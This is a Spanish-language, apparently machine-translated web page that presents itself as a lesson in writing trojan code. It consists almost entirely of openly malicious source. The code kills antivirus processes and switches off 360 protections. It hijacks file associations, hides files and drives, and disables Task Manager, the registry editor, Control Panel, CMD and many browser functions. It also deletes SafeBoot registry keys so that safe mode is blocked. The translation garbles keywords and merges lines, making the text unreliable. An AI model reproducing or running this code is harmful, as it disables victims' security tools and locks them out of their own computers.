Red de conocimiento informático - Aprendizaje de código fuente - El significado de escribir programas de código troyano utilizando un lenguaje de programación sencillo

El significado de escribir programas de código troyano utilizando un lenguaje de programación sencillo

run("taskkill /f /im kavsvc.exe", false, 1)

run("taskkill /f /im KVXP.kxp", false, 1)

p>

run("taskkill /f /im Ravmon.exe", false, 1)

run("taskkill /f /im Ravmon.exe", false, 1 )

run("taskkill /f /im Mcshield.exe", falso, 1)

run("taskkill /f /im VsTskMgr.exe", falso, 1)

Escribir clave de registro (4, "SOFTWARE\360Safe\safemon\ExecAccess", 0)

Escribir clave de registro (4, "SOFTWARE\360Safe\safemon\MonAccess", 0)

Escribir elementos de registro (4, "SOFTWARE\360Safe\safemon\SiteAccess", 0)

Escribir elementos de registro (4, "SOFTWARE\360Safe\safemon\UDiskAccess", 0)

Ejecutar ("taskkill /f /im 360tray.exe", false, 1) 'Finalizar proceso 360

' Modificar asociación

Escribir elemento de registro (1, ".txt\", "jpegfile")

Escriba el elemento de registro (1, ".inf\", "jpegfile")Escriba el elemento de registro (4, "SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder\Hidden \SHOWALL\CheckedValue", 0) 'Ocultar archivos y carpetas

Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0 ) 'Deshabilitar Administrador de Tareas

Escribir clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", 1) 'Deshabilitar Panel de Control

Escribir clave de registro (3, "Software \Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools", 1) ' Deshabilitar registro

Escribir clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ NoRun", 1 ) 'Oculta la ejecución en Inicio y prohíbe que WIN2000/XP cree una nueva tarea a través del Administrador de tareas y escriba la clave de registro (3, "SoftWare\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled", 1 )

' Ocultar unidades de disco en "modo MS-DOS".

No se puede ver en "Mi PC" ni en modo "MS-DOS"

Escriba la clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 4294967295)' Ocultar todas las unidades

Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", 4294967295) 'Deshabilitar todas las unidades

Escribir entrada de registro (3 , "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1) 'Ocultar opciones de carpeta

Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoDesktop ", 1) 'Ocultar el objeto del escritorio

Escribe la clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 1) 'Ocultar el inicio Apagar

Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", 1) 'Ocultar búsqueda en inicio

' Escribir entrada de registro ( 3. "Software\ Policies\Microsoft\Windows\System\DisableCMD", 1)'1 Deshabilitar archivos CMD y .BAT 2 Deshabilitar CMD pero no .BAT 0 Habilitar ambos elementos

Escriba el elemento de registro (3, " Software\Policies \Microsoft\Internet Explorer\Control Panel\HomePage", 1) 'Ocultar grupo de opciones de página de inicio

Escribir clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu", 1) 'Ocultar menú de archivos de IE

Escribir elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites", 1) 'Ocultar menú de favoritos

Escribir el elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting", 1) 'Desactivar la función de impresión de IE

Escriba el elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer \Restrictions \NoBrowserOptions", 1) 'Ocultar opciones de Internet

Escribir entrada de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource", 1) 'Prohibir

EVer el archivo fuente

Escribir el elemento de registro (3, "Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803", 3) 'Desactivar la función de descarga de IE

Escribir elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu", 1) ' Deshabilitar el menú contextual del botón derecho

Escribir elemento de registro (3, "Software\Microsoft\Windows \CurrentVersion\ Policies\Explorer\NoRealMode", 1) ' Deshabilite "Reiniciar la computadora para cambiar al modo MS-DOS" para escribir la entrada del registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", 1) ' Deshabilitar la visualización del elemento de registro de escritura " "Cerrar sesión" (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu", 1) ' Deshabilitar el menú de documentos para escribir el elemento de registro (3, "Software\Microsoft\ Windows\CurrentVersion\Policies\Explorer\NoLogOff" ", 1) ' Elimina el elemento "Iniciar sesión" en el menú "Inicio" y escribe elementos de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", 1) ' Desactivar el uso del botón derecho del ratón para escribir elementos de registro (3 , "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders", 1) 'Prohibir modificación del panel de control

.Versión 2 ' No se puede ingresar al modo seguro

Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\")

Elimine la entrada de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\ Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\")

Elimine la entrada de registro (4, “SYSTEM\ CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318 }\")

Elimine el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969- E325-11CE-BFC1-08002BE10318}\”)

Eliminar clave de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002

BE10318}\”)

Elimine el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)

Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\")

Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\ Control \SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\")

Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325- 11CE- BFC1-08002BE10318}\”)

Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)

Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\")

Eliminar elementos de registro (4, " SYSTEM\CurrentControlSet \Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\")

Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{ 745A17A0-74D3- 11D0-B6FE-00A0C90F57DA}\”)

Eliminar el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\”)

Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base\")

Elimine la entrada de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\ ")

Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\")

Eliminar el elemento de registro (4, "SYSTEM\ CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc \")

Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch\")

Eliminar elementos de registro (4, "SISTEMA\Actual

entControlSet\Control\SafeBoot\Minimal\dmadmin\”)

Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\”)

Eliminar elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\")

Eliminar elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys \ ")

Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\")

Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet \Control\ SafeBoot\Minimal\EventLog\”)

Eliminar el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\File system\”)

Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Filter\")

Elimine la entrada de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\")

Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\")

Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal \PCI Configuration\")

Eliminar elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay")

Destroy()